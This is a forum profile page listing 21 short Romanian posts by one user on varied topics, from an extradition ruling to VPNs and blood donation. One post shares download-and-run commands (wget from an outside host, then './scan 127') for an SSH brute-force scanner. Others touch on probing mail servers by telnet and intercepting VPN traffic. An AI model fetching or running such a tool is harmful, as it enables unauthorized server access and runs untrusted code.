Jump to content

RoEx

Active Members
  • Posts

    255
  • Joined

  • Last visited

Everything posted by RoEx

  1. Potrivit deciziei instanței supreme, magistrații au dispus predarea temporară a lui Marcel Lehel Lazăr, pe perioada desfășurării procedurilor judiciare, dar nu mai mult de 18 luni de la data preluării acestuia de către autoritățile statului solicitant.
  2. Inseamna ca nu cauti bine pe google. Eu am gasit primul rezultat : https://www.changer.com/ Ai grija , verifica site-ul inainte sa incerci sa nu fie scam (desi are https)
  3. Ma intreb , cu cat te impoziteaza fiscul ? 3% 16% sau 24% , ce tip de impozit iti acorda , pe profit , pe venit , pe ce dracu ?
  4. App. ce trebuie sa indeplinesti sa obti drepturi de distribuire a filmelor ? Care este cadrul legal?
  5. Salut Am nevoie de un program scris in c,c#,c++, pe o scara de complexitate de la 1-10 il situez pe undeva intre 3-4. Mai multe detalii pe privat. Timpul de executie sa fie relativ mic. Daca este careva interesat de acest proiect puteti lasa datele de contact in topicul asta . Multumesc
  6. Acum 5 ani am facut si eu ceva de genul asta , te folosesti de servarele mx si le accesezi telnet , daca imi amintesc eu bine (asta doar pentru validarea adresei de email , sa vezi daca exista)
  7. Folositi fratilor Human Emulator , daca stiti php e foarte simplu si poti face niste task-uri incredibil de reale .
  8. donati fratilor ca multi prieteni de-ai nostrii au de suferit
  9. salutare, sunt total incoerent din cauza celor petrecute ,o sa doman sange eu + colegii mei , nu neaparat in primele zile unde este imperial nevoie de sange(acum sunt donatori) , o sa fie nevoie de sange mai ales in zilele urmatoare pentru ca o tragedie de genul asta nu se duce dupa 2 zile , este nevoie , o sa fie nevoie de sange timp de multe zile incepand cu prezentul ....
  10. Oricum cryptocurrency enerveaza multe guverne worldwide.
  11. @Hubba spune-mi si mie cum ti-ai dat seama ? nu ca m-ar interesa cum prinde sau ce prinde doar sunt curios de metoda folosita . gosh-ul asta are parola , port specificat , prinde nologine etc ? edit: mi-am pus in cap toti boii odata cu topicul asta , data viitoare o sa fiu mai atent ce topicuri fac.
  12. Si mie imi place , nu arata rau deloc! ai monitorul cam mare
  13. Poate sa fie si din 2003 , pe mine nu ma intereseaza , am vazut arhiva pe pe un forum rusesc si m-am gandit ca va este folositor. Eu nu am treaba cu prostii de genul asta !!!
  14. @FanFm iesi acasa ! Poza este facuta de mine .
  15. si sa-ti iei net prin satelit din china ! sa fim seriosi , nu exista alternativa , ori devenim sihastrii ori ...
  16. In 2020 daca nu o sa ai telefon nu o sa existi . Oricum toti martalogi astia google/yahoo/facebook/microsoft vor cat mai multe informatii despre fiecare utilizator in parte.
  17. Am gasit un bruteforce din 2015 pe un forum rusesc (pacat ca nu pot sa specific sursa) Am tot vazut cereri pt programe de gen in ultima vreme si m-am gandit ca va este folositor L-am test,merge si in cazul "/sbin/nologin:/sbin/nobash"drept urmare : Credite : download link and commands: wget http://r89x.com/bssh.tgz gunzip -c bssh.tgz | tar xvf - cd bssh/ ./scan 127 O sa sterg postarea pe 1 noiembrie 2015 !
  18. eu stiu ca google-ul nu te depuncteaza daca folosesti cratima in numele domeniului. edit: de acum 1-2 ani chiar
  19. RoEx

    1 year ibVPN

    mersi , foarte pertinent raspunsul , asta este in cazul openvpn acum citeam asta https://technet.microsoft.com/en-us/library/cc779919(v=ws.10).aspx#w2k3tr_vpn_how_rffz sa inteleg mai bine cum merge. scuze de off
  20. RoEx

    1 year ibVPN

    eu ma gandesc asa , daca exista Man-in-the-middle ca si concept , tot traficul trece prin tine ca provider de vpn , mai exista si burp suite (doar un exemplu) pt traficul pe ssl , si de aici doar orizontul e limita ta. sper ca ati inteles la ce ma refer desi sunt beat nu o sa ma fac mai bine inteles. //edit : nu stiu daca este posibil , e doar o idee la betie
  21. nelimitat , avand in vedere raportul "calitate - cantitate - pret"
×
×
  • Create New...